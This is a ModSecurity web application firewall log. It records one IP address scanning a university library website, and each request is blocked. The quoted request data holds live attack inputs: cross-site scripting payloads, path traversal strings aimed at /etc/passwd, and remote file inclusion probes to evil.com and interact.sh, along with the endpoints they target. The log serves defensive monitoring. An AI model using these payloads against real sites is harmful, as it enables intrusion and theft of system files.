[Tue Aug 29 11:55:22.605641 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqw52UAAAAH"]
[Tue Aug 29 11:55:23.557635 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAolKnIAAAAe"]
[Tue Aug 29 11:55:23.957102 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAolKnYAAAAe"]
[Tue Aug 29 11:55:24.067210 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqqte0AAAAA"]
[Tue Aug 29 11:55:24.638490 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAqqtfIAAAAA"]
[Tue Aug 29 11:55:24.743956 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApXgpIAAAAU"]
[Tue Aug 29 11:55:25.758742 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqeFV4AAAAx"]
[Tue Aug 29 11:55:25.863256 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAolKogAAAAe"]
[Tue Aug 29 11:55:26.731652 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqeFWkAAAAx"]
[Tue Aug 29 11:55:28.537299 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqTvroAAAAa"]
[Tue Aug 29 11:55:29.567096 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QcCo-f0AAAqTvr4AAAAa"]
[Tue Aug 29 11:55:29.872261 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAolKqUAAAAe"]
[Tue Aug 29 11:55:30.709071 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqeFYAAAAAx"]
[Tue Aug 29 11:55:31.588254 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqSwuYAAAAN"]
[Tue Aug 29 11:55:32.871787 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqSwvEAAAAN"]
[Tue Aug 29 11:55:33.884711 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAoz8HYAAAAS"]
[Tue Aug 29 11:55:35.777296 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAAq3a4sAAAAI"]
[Tue Aug 29 11:55:36.266458 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAApHRjcAAAAP"]
[Tue Aug 29 11:55:36.600198 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq5@CEAAAAK"]
[Tue Aug 29 11:55:37.728914 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ScCo-f0AAAqTvvEAAAAa"]
[Tue Aug 29 11:55:37.815690 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAoz8I8AAAAS"]
[Tue Aug 29 11:55:38.127157 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAq4fVkAAAAJ"]
[Tue Aug 29 11:55:38.625622 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAqTvvgAAAAa"]
[Tue Aug 29 11:55:40.092855 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAq5@DYAAAAK"]
[Tue Aug 29 11:55:41.918650 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAoz8KMAAAAS"]
[Tue Aug 29 11:55:43.802711 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAApbUnUAAAAh"]
[Tue Aug 29 11:55:43.920818 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqY6HUAAAAr"]
[Tue Aug 29 11:55:44.566099 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAolKvoAAAAe"]
[Tue Aug 29 11:55:44.722322 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqqtjAAAAAA"]
